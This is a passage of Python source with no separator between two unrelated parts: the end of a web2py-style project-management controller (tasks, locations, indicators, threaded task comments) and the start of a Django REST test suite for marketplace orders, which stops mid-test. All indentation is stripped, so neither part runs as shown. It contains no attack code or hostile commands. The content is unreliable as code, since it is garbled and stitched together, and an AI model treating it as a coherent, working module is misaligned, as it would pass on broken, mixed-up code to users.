# filter_widgets = [S3OptionsFilter("indicator_id",
# label = T("Indicator"),
# ),
# ]
#else:
# filter_widgets = None
#r.component.configure(filter_widgets = filter_widgets)
elif component_name == "task":
if not auth.s3_has_role("STAFF"):
# Hide fields which are meant for staff members
# (avoid confusion both of inputters & recipients)
unwanted_fields = ["source",
"pe_id",
"date_due",
"time_estimated",
"time_actual",
"status",
]
ttable = component.table
for fieldname in unwanted_fields:
field = ttable[fieldname]
field.readable = field.writable = False
if "open" in r.get_vars:
# Show only the Open Tasks for this Project (unused?)
statuses = s3.project_task_active_statuses
query = FS("status").belongs(statuses)
r.resource.add_component_filter("task", query)
# Filter activities and milestones to the current project
options_filter = {"filterby": "project_id",
"filter_opts": (r.id,),
}
fields = []
if settings.get_project_activities():
fields.append(s3db.project_task_activity.activity_id)
if settings.get_project_milestones():
fields.append(s3db.project_task_milestone.milestone_id)
for f in fields:
requires = f.requires
if isinstance(requires, IS_EMPTY_OR):
requires = requires.other
if hasattr(requires, "set_filter"):
requires.set_filter(**options_filter)
elif component_name == "beneficiary":
# Filter the location selector to the project's locations
component.table.project_location_id.requires = \
IS_EMPTY_OR(IS_ONE_OF(db, "project_location.id",
s3db.project_location_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
)
elif component_name in ("human_resource", "human_resource_project"):
htable = s3db.hrm_human_resource
htable.person_id.represent = \
s3db.pr_PersonRepresent(show_link=True)
# These values are defined in hrm_type_opts
human_resource_id = r.table.human_resource_id
filter_opts = None
if hr_group:
crud_strings = s3.crud_strings
if hr_group == "staff":
filter_opts = (1,)
human_resource_id.label = T("Staff")
crud_strings["project_human_resource_project"] = crud_strings["hrm_staff"]
elif hr_group == "volunteer":
filter_opts = (2,)
human_resource_id.label = T("Volunteer")
crud_strings["project_human_resource_project"] = crud_strings["hrm_volunteer"]
if filter_opts:
# Use the group to filter the form widget when
# adding a new record
human_resource_id.requires = \
IS_ONE_OF(db, "hrm_human_resource.id",
s3db.hrm_human_resource_represent,
filterby="type",
filter_opts=filter_opts,
orderby="hrm_human_resource.person_id",
sort=True
)
# @ToDo:
#if settings.has_module("budget"):
# from s3 import S3SQLCustomForm, S3SQLInlineComponent
# field = s3db.budget_allocation.budget_entity_id
# field.readable = field.writable = True
# field.requires = S3Represent(lookup="budget_budget", key="budget_entity_id")
# field.requires = IS_ONE_OF()
#
# crud_form = S3SQLCustomForm("project_id",
# "human_resource_id",
# "status",
# S3SQLInlineComponent("allocation",
# label = T("Budget"),
# fields = ["budget_entity_id",
# "start_date",
# "end_date",
# "daily_cost",
# ],
# ),
# )
# s3db.configure("project_human_resoruce_project",
# crud_form = crud_form,
# list_fields = [#"project_id", # Not being dropped in component view
# "human_resource_id",
# "status",
# "allocation.budget_entity_id",
# "allocation.start_date",
# "allocation.end_date",
# "allocation.daily_cost",
# ],
elif component_name == "document":
# Hide unnecessary fields
dtable = component.table
dtable.organisation_id.readable = \
dtable.organisation_id.writable = False
dtable.person_id.readable = \
dtable.person_id.writable = False
dtable.location_id.readable = \
dtable.location_id.writable = False
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
component_name = r.component_name
if not r.component:
if mode_task:
read_url = URL(args=["[id]", "task"])
update_url = URL(args=["[id]", "task"])
s3_action_buttons(r,
read_url=read_url,
update_url=update_url)
#elif component_name == "indicator":
# # Open should open the profile page
# read_url = URL(f="indicator",
# args=["[id]", "profile"])
# update_url = URL(f="indicator",
# args=["[id]", "profile"])
# s3_action_buttons(r,
# read_url=read_url,
# update_url=update_url)
elif component_name == "task" and r.component_id:
# Put Comments in rfooter
s3db.project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.component_id],
ajax=True)
return output
s3.postp = postp
return s3_rest_controller(module, "project",
csv_template = "project",
hide_filter = {None: False,
#"indicator_data": False,
"_default": True,
},
rheader = s3db.project_rheader,
)
# -----------------------------------------------------------------------------
def open_tasks_for_project():
"""
Simplified controller to select a project and open the
list of open tasks for it
"""
def prep(r):
tablename = "project_project"
s3.crud_strings[tablename].title_list = T("Open Tasks for Project")
s3.crud_labels.READ = s3.crud_labels.UPDATE = T("Select")
s3db.configure(tablename,
deletable=False,
listadd=False,
)
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive and not r.component:
tasklist_url = URL(f="task", vars={"project":"[id]"})
s3_action_buttons(r,
deletable=False,
read_url=tasklist_url,
update_url=tasklist_url)
return output
s3.postp = postp
return s3_rest_controller(module, "project",
hide_filter=False,
)
# -----------------------------------------------------------------------------
def set_theme_requires(sector_ids):
"""
Filters the theme_id based on the sector_id
"""
ttable = s3db.project_theme
tstable = s3db.project_theme_sector
# All themes linked to the project's sectors or to no sectors
rows = db().select(ttable.id,
tstable.sector_id,
left=tstable.on(ttable.id == tstable.theme_id))
sector_ids = sector_ids or []
theme_ids = [row.project_theme.id for row in rows
if not row.project_theme_sector.sector_id or
row.project_theme_sector.sector_id in sector_ids]
table = s3db.project_theme_project
field = table.theme_id
field.requires = IS_EMPTY_OR(IS_ONE_OF(db, "project_theme.id",
field.represent,
filterby="id",
filter_opts=theme_ids,
sort=True,
)
)
# -----------------------------------------------------------------------------
def set_activity_type_requires(tablename, sector_ids):
"""
Filters the activity_type_id based on the sector_id
"""
attable = s3db.project_activity_type
if sector_ids:
atstable = s3db.project_activity_type_sector
# All activity_types linked to the project's sectors or to no sectors
rows = db().select(attable.id,
atstable.sector_id,
left=atstable.on(attable.id == atstable.activity_type_id))
activity_type_ids = [row.project_activity_type.id for row in rows
if not row.project_activity_type_sector.sector_id or
row.project_activity_type_sector.sector_id in sector_ids]
else:
activity_type_ids = []
s3db[tablename].activity_type_id.requires = IS_EMPTY_OR(
IS_ONE_OF(db, "project_activity_type.id",
s3base.S3Represent(lookup="project_activity_type"),
filterby="id",
filter_opts=activity_type_ids,
sort=True,
)
)
# =============================================================================
def sector():
""" RESTful CRUD controller """
return s3_rest_controller("org", "sector")
# -----------------------------------------------------------------------------
def status():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme_project():
"""
RESTful CRUD controller
- not normally exposed to users via a menu
"""
return s3_rest_controller()
# -----------------------------------------------------------------------------
def theme_sector():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def hazard():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def framework():
""" RESTful CRUD controller """
return s3_rest_controller(dtargs={"dt_text_maximum_len": 160},
hide_filter=True,
)
# =============================================================================
def organisation():
""" RESTful CRUD controller """
if settings.get_project_multiple_organisations():
# e.g. IFRC
s3db.configure("project_organisation",
deletable = False,
editable = False,
insertable = False,
)
#list_btn = A(T("Funding Report"),
# _href=URL(c="project", f="organisation",
# args="report", vars=get_vars),
# _class="action-btn")
return s3_rest_controller(#list_btn=list_btn,
)
else:
# e.g. DRRPP
tabs = [(T("Basic Details"), None),
(T("Projects"), "project"),
(T("Contacts"), "human_resource"),
]
rheader = lambda r: s3db.org_rheader(r, tabs)
return s3_rest_controller("org", resourcename,
rheader = rheader,
)
# =============================================================================
def beneficiary_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def beneficiary():
""" RESTful CRUD controller """
# Normally only used in Report
# - make changes as component of Project
s3db.configure("project_beneficiary",
deletable = False,
editable = False,
insertable = False,
)
list_btn = A(T("Beneficiary Report"),
_href=URL(c="project", f="beneficiary",
args="report", vars=get_vars),
_class="action-btn")
#def prep(r):
# if r.method in ("create", "create.popup", "update", "update.popup"):
# # Coming from Profile page?
# location_id = r.get_vars.get("~.(location)", None)
# if location_id:
# field = r.table.location_id
# field.default = location_id
# field.readable = field.writable = False
# if r.record:
# field = r.table.location_id
# field.comment = None
# field.writable = False
# return True
#s3.prep = prep
return s3_rest_controller(hide_filter=False)
# =============================================================================
def activity_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity_type_sector():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity_organisation():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def activity():
""" RESTful CRUD controller """
table = s3db.project_activity
if "project_id" in get_vars:
field = table.project_id
field.default = get_vars.project_id
field.writable = False
field.comment = None
# Pre-process
def prep(r):
if r.interactive:
if r.component is not None:
if r.component_name == "document":
doc_table = s3db.doc_document
doc_table.organisation_id.readable = doc_table.organisation_id.writable = False
doc_table.person_id.readable = doc_table.person_id.writable = False
doc_table.location_id.readable = doc_table.location_id.writable = False
return True
s3.prep = prep
return s3_rest_controller(csv_template = "activity",
hide_filter = False,
rheader = s3db.project_rheader,
)
# -----------------------------------------------------------------------------
def location():
""" RESTful CRUD controller """
table = s3db.project_location
# Pre-process
def prep(r):
if r.interactive:
if r.record:
table = s3db.project_sector_project
query = (table.project_id == r.record.project_id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
else:
sector_ids = []
set_activity_type_requires("project_activity_type_location", sector_ids)
if r.component_name == "document":
table = db.doc_document
table.organisation_id.readable = table.organisation_id.writable = False
table.person_id.readable = table.person_id.writable = False
table.location_id.readable = table.location_id.writable = False
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.representation == "plain":
# Replace the Map Popup contents with custom content
item = TABLE()
if settings.get_project_community():
# The Community is the primary resource
record = r.record
table.id.readable = False
table.location_id.readable = False
fields = [table[f] for f in table.fields if table[f].readable]
for field in fields:
data = record[field]
if data:
represent = field.represent
if represent:
item.append(TR(TD(field.label),
TD(represent(data))))
else:
item.append(TR(TD(field.label), TD(data)))
hierarchy = gis.get_location_hierarchy()
gtable = s3db.gis_location
location = db(gtable.id == record.location_id).select(gtable.L1,
gtable.L2,
gtable.L3,
gtable.L4,
).first()
if location:
for field in ["L4", "L3", "L2", "L1"]:
if field in hierarchy and location[field]:
item.append(TR(TD(hierarchy[field]),
TD(location[field])))
output["item"] = item
else:
# The Project is the primary resource
project_id = r.record.project_id
ptable = s3db.project_project
query = (ptable.id == project_id)
project = db(query).select(limitby=(0, 1)).first()
ptable.id.readable = False
fields = [ptable[f] for f in ptable.fields if ptable[f].readable]
for field in fields:
if field == "currency":
# Don't display Currency if no Budget
if not project["budget"]:
continue
data = project[field]
if data:
represent = field.represent
if represent:
item.append(TR(TD(field.label),
TD(represent(data))))
else:
item.append(TR(TD(field.label), TD(data)))
title = s3.crud_strings["project_project"].title_display
# Assume authorised to see details
popup_url = URL(f="project", args=[project_id])
details_btn = A(T("Open"),
_href=popup_url,
_class="btn",
_id="details-btn",
_target="_blank")
output = dict(item = item,
title = title,
details_btn = details_btn,
)
return output
s3.postp = postp
return s3_rest_controller(interactive_report = True,
rheader = s3db.project_rheader,
hide_filter = False,
csv_template = "location",
)
# -----------------------------------------------------------------------------
def demographic():
""" RESTful CRUD controller """
return s3_rest_controller("stats", "demographic")
# -----------------------------------------------------------------------------
def demographic_data():
""" RESTful CRUD controller """
return s3db.stats_demographic_data_controller()
# -----------------------------------------------------------------------------
def location_contact():
""" RESTful CRUD controller for Community Contacts """
return s3_rest_controller(hide_filter=False)
# -----------------------------------------------------------------------------
def report():
"""
RESTful CRUD controller
@ToDo: Why is this needed? To have no rheader?
"""
return s3_rest_controller(module, "activity")
# -----------------------------------------------------------------------------
def partners():
"""
RESTful CRUD controller for Organisations filtered by Type
"""
# @ToDo: This may need to be a deployment setting
get_vars["organisation_type.name"] = \
"Academic,Bilateral,Government,Intergovernmental,NGO,UN agency"
# Load model
table = s3db.org_organisation
# Type is Mandatory (otherwise they can disappear from view)
# @ToDo: How to achieve this in an S3SQLInlineLink?
# Modify CRUD Strings
s3.crud_strings.org_organisation = Storage(
label_create = T("Create Partner Organization"),
title_display = T("Partner Organization Details"),
title_list = T("Partner Organizations"),
title_update = T("Edit Partner Organization"),
title_upload = T("Import Partner Organizations"),
label_list_button = T("List Partner Organizations"),
label_delete_button = T("Delete Partner Organization"),
msg_record_created = T("Partner Organization added"),
msg_record_modified = T("Partner Organization updated"),
msg_record_deleted = T("Partner Organization deleted"),
msg_list_empty = T("No Partner Organizations currently registered")
)
return s3db.org_organisation_controller()
# =============================================================================
def task():
""" RESTful CRUD controller """
return s3db.project_task_controller()
# =============================================================================
def task_project():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_activity():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_milestone():
""" RESTful CRUD controller for options.s3json lookups """
if auth.permission.format != "s3json":
return ""
# Pre-process
def prep(r):
if r.method != "options":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def task_tag():
""" RESTful CRUD controller for options.s3json lookups """
# Pre-process
def prep(r):
if r.method != "options" or r.representation != "s3json":
return False
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def role():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
def member():
""" RESTful CRUD Controller """
return s3_rest_controller()
# =============================================================================
def milestone():
""" RESTful CRUD controller """
if "project_id" in get_vars:
field = s3db.project_milestone.project_id
field.default = get_vars.project_id
field.writable = False
field.comment = None
return s3_rest_controller()
# =============================================================================
def tag():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
def time():
""" RESTful CRUD controller """
# Load model to get normal CRUD strings
table = s3db.project_time
hide_filter = False
if "mine" in get_vars:
# Display this user's Logged Hours in reverse-order
hide_filter = True
s3.crud_strings["project_time"].title_list = T("My Logged Hours")
person_id = auth.s3_logged_in_person()
if person_id:
# @ToDo: Use URL filter instead, but the Search page will have
# to populate its widgets based on the URL filter
s3.filter = (table.person_id == person_id)
# Log time with just this user's open tasks visible
ttable = db.project_task
query = (ttable.pe_id == auth.user.pe_id) & \
(ttable.deleted == False)
if "update" not in request.args:
# Only log time against Open Tasks
query &= (ttable.status.belongs(s3db.project_task_active_statuses))
dbset = db(query)
table.task_id.requires = IS_ONE_OF(dbset, "project_task.id",
s3db.project_task_represent_w_project
)
list_fields = ["id",
"date",
"hours",
(T("Project"), "task_id$task_project.project_id"),
(T("Activity"), "task_id$task_activity.activity_id"),
"task_id",
"comments",
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(5, (T("Milestone"), "task_id$task_milestone.milestone_id"))
s3db.configure("project_time",
list_fields = list_fields,
orderby = "project_time.date desc",
)
elif "week" in get_vars:
# Filter to the specified number of weeks
weeks = int(get_vars.get("week", 1))
now = request.utcnow
week = datetime.timedelta(days=7)
delta = week * weeks
s3.filter = (table.date > (now - delta))
elif "month" in get_vars:
# Filter to the specified number of months
months = int(get_vars.get("month", 1))
now = request.utcnow
month = datetime.timedelta(weeks=4)
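# NB: a month is approximated as four weeks for this filter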
delta = month * months
s3.filter = (table.date > (now - delta))
return s3_rest_controller(hide_filter=hide_filter)
# =============================================================================
# Programmes
# =============================================================================
def programme():
""" RESTful controller for Programmes """
return s3_rest_controller()
def programme_project():
""" RESTful controller for Programmes <> Projects """
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# =============================================================================
# Planning
# =============================================================================
def goal():
""" RESTful controller for Goals """
return s3_rest_controller()
def outcome():
""" RESTful controller for Outcomes """
return s3_rest_controller()
def output():
""" RESTful controller for Outputs """
return s3_rest_controller()
def indicator():
""" RESTful CRUD controller """
def prep(r):
if r.method == "profile":
# @ToDo: Needs Edit button
table = r.table
record = r.record
code = record.code
def dt_row_actions(component):
return lambda r, list_id: [
{"label": T("Open"),
"url": r.url(component=component,
component_id="[id]",
method="update.popup",
vars={"refresh": list_id}),
"_class": "action-btn edit s3_modal",
},
{"label": T("Delete"),
"_ajaxurl": r.url(component=component,
component_id="[id]",
method="delete.json",
),
"_class": "action-btn delete-btn-ajax dt-ajax-delete",
},
]
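# dt_row_actions builds the per-row action buttons for the embedded
# datatable: "Open" launches an update popup in a modal, "Delete" fires
# an Ajax delete against the component record.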
data_widget = dict(label = "Data",
label_create = "Add Data",
type = "datatable",
actions = dt_row_actions("indicator_data"),
tablename = "project_indicator_data",
filter = FS("indicator_id") == record.id,
create_controller = "project",
create_function = "indicator",
create_component = "indicator_data",
#icon = "book",
)
profile_widgets = [data_widget,
]
s3db.configure("project_indicator",
profile_cols = 1,
profile_header = DIV(H2(code),
H3(table.name.label),
P(record.name),
H3(table.verification.label),
P(record.verification),
_class="profile-header",
),
profile_title = "%s : %s" % (s3_unicode(s3.crud_strings["project_indicator"].title_display),
code),
profile_widgets = profile_widgets,
)
s3db.configure("project_indicator_data",
list_fields = ["name",
"end_date",
"target_value",
"value",
(T("Percentage"), "percentage"),
"comments",
],
)
s3.rfooter = A(T("Return to Project"),
_href=URL(f="project",
args=[record.project_id, "indicator"]),
_class = "action-btn"
)
elif r.component_name == "indicator_data":
field = s3db.project_indicator_data.project_id
field.default = r.record.project_id
field.readable = field.writable = False
return True
s3.prep = prep
return s3_rest_controller()
def indicator_data():
""" RESTful CRUD controller """
return s3_rest_controller()
def person():
""" RESTful controller for Community Volunteers """
# @ToDo: Filter
return s3db.vol_person_controller()
def volunteer():
""" RESTful controller for Community Volunteers """
# @ToDo: Filter
#s3.filter = FS("type") == 2
return s3db.vol_volunteer_controller()
# =============================================================================
# Comments
# =============================================================================
def comment_parse(comment, comments, task_id=None):
"""
Parse a Comment
@param: comment - a gluon.sql.Row: the current comment
@param: comments - a gluon.sql.Rows: full list of comments
@param: task_id - a reference ID: optional task commented on
"""
author = B(T("Anonymous"))
if comment.created_by:
utable = s3db.auth_user
ptable = s3db.pr_person
ltable = s3db.pr_person_user
query = (utable.id == comment.created_by)
left = [ltable.on(ltable.user_id == utable.id),
ptable.on(ptable.pe_id == ltable.pe_id)]
row = db(query).select(utable.email,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
left=left, limitby=(0, 1)).first()
if row:
person = row.pr_person
user = row[utable._tablename]
username = s3_fullname(person)
email = user.email.strip().lower()
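# Gravatar identifies avatars by the MD5 hex digest of the lower-cased
# e-mail address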
import hashlib
hash = hashlib.md5(email).hexdigest()
url = "http://www.gravatar.com/%s" % hash
author = B(A(username, _href=url, _target="top"))
if not task_id and comment.task_id:
table = s3db.project_task
task = "re: %s" % table[comment.task_id].name
header = DIV(author, " ", task)
task_id = comment.task_id
else:
header = author
thread = LI(DIV(s3base.s3_avatar_represent(comment.created_by),
DIV(DIV(header,
_class="comment-header"),
DIV(XML(comment.body),
_class="comment-body"),
_class="comment-text"),
DIV(DIV(comment.created_on,
_class="comment-date"),
DIV(A(T("Reply"),
_class="action-btn"),
_onclick="comment_reply(%i);" % comment.id,
_class="comment-reply"),
_class="fright"),
_id="comment-%i" % comment.id,
_task_id=task_id,
_class="comment-box"))
# Add the children of this thread
children = UL(_class="children")
id = comment.id
count = 0
for comment in comments:
if comment.parent == id:
count = 1
child = comment_parse(comment, comments, task_id=task_id)
children.append(child)
if count == 1:
thread.append(children)
return thread
# -----------------------------------------------------------------------------
def comments():
""" Function accessed by AJAX from rfooter to handle Comments """
try:
task_id = request.args[0]
except:
raise HTTP(400)
table = s3db.project_comment
field = table.task_id
field.default = task_id
field.writable = field.readable = False
# Create S3Request for S3SQLForm
r = s3_request(prefix="project",
name="comment",
# Override task_id
args=[],
vars=None,
# Override .loads
extension="html")
# Customise resource
r.customise_resource()
# Form to add a new Comment
form = s3base.S3SQLCustomForm("parent", "task_id", "body")(r)
# List of existing Comments
comments = db(field == task_id).select(table.id,
table.parent,
table.body,
table.created_by,
table.created_on)
output = UL(_id="comments")
for comment in comments:
if not comment.parent:
# Show top-level threads at top-level
thread = comment_parse(comment, comments, task_id=task_id)
output.append(thread)
script = "".join((
'''$('#comments').collapsible({xoffset:'-5',yoffset:'50',imagehide:img_path+'arrow-down.png',imageshow:img_path+'arrow-right.png',defaulthide:false})
$('#project_comment_parent__row1').hide()
$('#project_comment_parent__row').hide()
$('#project_comment_body').ckeditor(ck_config)
$('#submit_record__row input').click(function(){
$('#comment-form').hide()
$('#project_comment_body').ckeditorGet().destroy()
return true
})'''))
# No layout in this output!
#s3.jquery_ready.append(script)
output = DIV(output,
DIV(H4(T("New Post"),
_id="comment-title"),
form,
_id="comment-form",
_class="clear"),
SCRIPT(script))
return XML(output)
def comment():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
# Campaigns
# =============================================================================
def campaign():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_keyword():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_message():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_response():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_response_summary():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def human_resource_project():
"""
REST controller for options.s3json lookups
"""
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# END =========================================================================
|
|
import datetime
from unittest import mock
from ddt import data, ddt
from freezegun import freeze_time
from rest_framework import status, test
from waldur_core.structure.models import CustomerRole
from waldur_core.structure.tests import factories as structure_factories
from waldur_core.structure.tests import fixtures
from waldur_mastermind.marketplace import models
from waldur_mastermind.marketplace.tasks import process_order
from waldur_mastermind.marketplace.tests import factories
from waldur_mastermind.marketplace.tests.factories import OFFERING_OPTIONS
from waldur_mastermind.marketplace.tests.helpers import override_marketplace_settings
from waldur_mastermind.marketplace_support import PLUGIN_NAME
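# These tests exercise the marketplace order API: listing visibility,
# order creation validation (offerings, plans, limits, terms of service,
# divisions), and the approval/rejection workflows.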
@ddt
class OrderGetTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
@data('staff', 'owner', 'admin', 'manager')
def test_orders_should_be_visible_to_colleagues_and_staff(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 1)
@data('user')
def test_orders_should_be_invisible_to_other_users(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 0)
def test_items_should_be_invisible_to_unauthenticated_users(self):
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@ddt
class OrderCreateTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
@data('staff', 'owner', 'admin', 'manager')
def test_user_can_create_order_in_valid_project(self, user):
user = getattr(self.fixture, user)
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
@data('user')
def test_user_can_not_create_order_in_invalid_project(self, user):
user = getattr(self.fixture, user)
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_not_create_item_if_offering_is_not_available(self):
offering = factories.OfferingFactory(state=models.Offering.States.ARCHIVED)
response = self.create_order(self.fixture.staff, offering)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_order_with_plan(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
@mock.patch('waldur_mastermind.marketplace.tasks.notify_order_approvers.delay')
def test_notification_is_sent_when_order_is_created(self, mock_task):
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, shared=True, billable=True
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.manager, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
mock_task.assert_called_once()
def test_can_not_create_order_if_offering_is_not_available_to_customer(self):
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, shared=False
)
offering.customer.add_user(self.fixture.owner, CustomerRole.OWNER)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.owner, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_not_create_order_with_plan_related_to_another_offering(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_not_create_order_if_plan_max_amount_has_been_reached(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering, max_amount=3)
factories.ResourceFactory.create_batch(3, plan=plan, offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_with_valid_attributes_specified_by_options(self):
attributes = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, options=OFFERING_OPTIONS
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': attributes,
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['items'][0]['attributes'], attributes)
def test_user_can_not_create_order_with_invalid_attributes(self):
attributes = {
'storage': 'invalid value',
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, options=OFFERING_OPTIONS
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': attributes,
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_with_valid_limits(self):
limits = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, type=PLUGIN_NAME
)
plan = factories.PlanFactory(offering=offering)
for key in limits.keys():
models.OfferingComponent.objects.create(
offering=offering,
type=key,
billing_type=models.OfferingComponent.BillingTypes.LIMIT,
)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'limits': limits,
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.data)
order_item = models.OrderItem.objects.last()
self.assertEqual(order_item.limits['cpu_count'], 5)
def test_user_can_not_create_order_with_invalid_limits(self):
limits = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
for key in limits.keys():
models.OfferingComponent.objects.create(
offering=offering,
type=key,
billing_type=models.OfferingComponent.BillingTypes.FIXED,
)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'limits': limits,
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_order_creating_is_not_available_for_blocked_organization(self):
user = self.fixture.owner
self.fixture.customer.blocked = True
self.fixture.customer.save()
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_if_terms_of_service_have_been_accepted(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.terms_of_service = 'Terms of service'
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
'accepting_terms_of_service': True,
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
